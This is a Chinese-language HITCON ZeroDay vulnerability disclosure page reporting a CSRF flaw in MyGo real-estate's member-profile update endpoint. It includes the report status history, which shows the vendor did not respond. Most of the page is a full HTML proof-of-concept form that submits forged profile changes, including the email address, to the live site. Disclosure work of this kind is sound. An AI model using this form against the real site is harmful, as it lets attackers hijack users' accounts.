MyGo房地產 修改會員資料 CSRF - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2025-00470
  •  發信 Vendor: MyGo房地產
  • Title: MyGo房地產 修改會員資料 CSRF
  • Introduction: 修改會員資料 CSRF

處理狀態

目前狀態

公開
Last Update : 2025/07/27
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2025/05/27 19:04:57 : 新提交 (由 yusheng 更新此狀態)
  • 2025/05/27 19:12:04 : 新提交 (由 yusheng 更新此狀態)
  • 2025/05/30 09:15:13 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/06/12 14:45:20 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/06/12 14:45:20 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/06/12 14:45:20 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/07/27 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2025-00470
  • 通報者:cat1528985 (yusheng)
  • 風險:中
  • 類型:跨站冒名請求 (Cross-Site Request Forgery, CSRF)

參考資料

攻擊者可經由該漏洞惡意操控使用者帳號進行惡意行為。

漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://www.mygo.com/mnguserinfo/savebase

敘述

POC 影片:https://drive.google.com/file/d/1WSF3pcXIq5nSjnyAd14bEpwWz3_1FIIy/view?usp=sharing

該網站修改會員的 API https://www.mygo.com/mnguserinfo/savebase 沒有實作 CSRF Token 防護

攻擊者可以構造一個修改會員表單

<!DOCTYPE html>
<html lang="zh-TW">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>個人資料表單</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            max-width: 600px;
            margin: 0 auto;
            padding: 20px;
        }
        .form-group {
            margin-bottom: 15px;
        }
        label {
            display: block;
            margin-bottom: 5px;
            font-weight: bold;
        }
        input, select {
            width: 100%;
            padding: 8px;
            border: 1px solid #ddd;
            border-radius: 4px;
        }
        button {
            background-color: #4CAF50;
            color: white;
            padding: 10px 15px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px;
        }
        button:hover {
            background-color: #45a049;
        }
    </style>
</head>
<body>
    <h2>個人資料表單</h2>
    <form action="https://www.mygo.com/mnguserinfo/savebase" method="POST">
        <div class="form-group">
            <label for="firstname">姓氏</label>
            <input type="text" id="firstname" name="firstname" value="陳">
        </div>

        <div class="form-group">
            <label for="lastname">名字</label>
            <input type="text" id="lastname" name="lastname" value="昱昇">
        </div>

        <div class="form-group">
            <label for="name">全名</label>
            <input type="text" id="name" name="name" value="陳昱昇">
        </div>

        <div class="form-group">
            <label for="email">電子郵件</label>
            <input type="email" id="email" name="email" value="[email protected]">
        </div>

        <div class="form-group">
            <label for="sex">性別</label>
            <select id="sex" name="sex">
                <option value="0" selected>男</option>
                <option value="1">女</option>
            </select>
        </div>

        <div class="form-group">
            <label for="nationality">國籍</label>
            <input type="text" id="nationality" name="nationality">
        </div>

        <div class="form-group">
            <label for="birthday">生日</label>
            <input type="date" id="birthday" name="birthday">
        </div>

        <div class="form-group">
            <label for="tel_pre">電話國碼</label>
            <input type="text" id="tel_pre" name="tel_pre">
        </div>

        <div class="form-group">
            <label for="tel">電話號碼</label>
            <input type="tel" id="tel" name="tel">
        </div>

        <input type="hidden" name="tel_type" value="1">

        <div class="form-group">
            <label for="fax_pre">傳真國碼</label>
            <input type="text" id="fax_pre" name="fax_pre">
        </div>

        <div class="form-group">
            <label for="fax">傳真號碼</label>
            <input type="text" id="fax" name="fax">
        </div>

        <input type="hidden" name="fax_type" value="1">

        <div class="form-group">
            <label for="region">地區</label>
            <select id="region" name="region">
                <option value="0" selected>請選擇</option>
            </select>
        </div>

        <div class="form-group">
            <label for="state">省/州</label>
            <select id="state" name="state">
                <option value="0" selected>請選擇</option>
            </select>
        </div>

        <div class="form-group">
            <label for="city">城市</label>
            <select id="city" name="city">
                <option value="0" selected>請選擇</option>
            </select>
        </div>

        <div class="form-group">
            <label for="area">區域</label>
            <select id="area" name="area">
                <option value="0" selected>請選擇</option>
            </select>
        </div>

        <div class="form-group">
            <label for="address">地址</label>
            <input type="text" id="address" name="address">
        </div>

        <input type="hidden" name="addr_type" value="1">
        <input type="hidden" name="comms_seq" value="">
        <input type="hidden" name="comms" value="">

        <button type="submit">提交</button>
    </form>
</body>
</html>

修補建議

CSRF Token

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;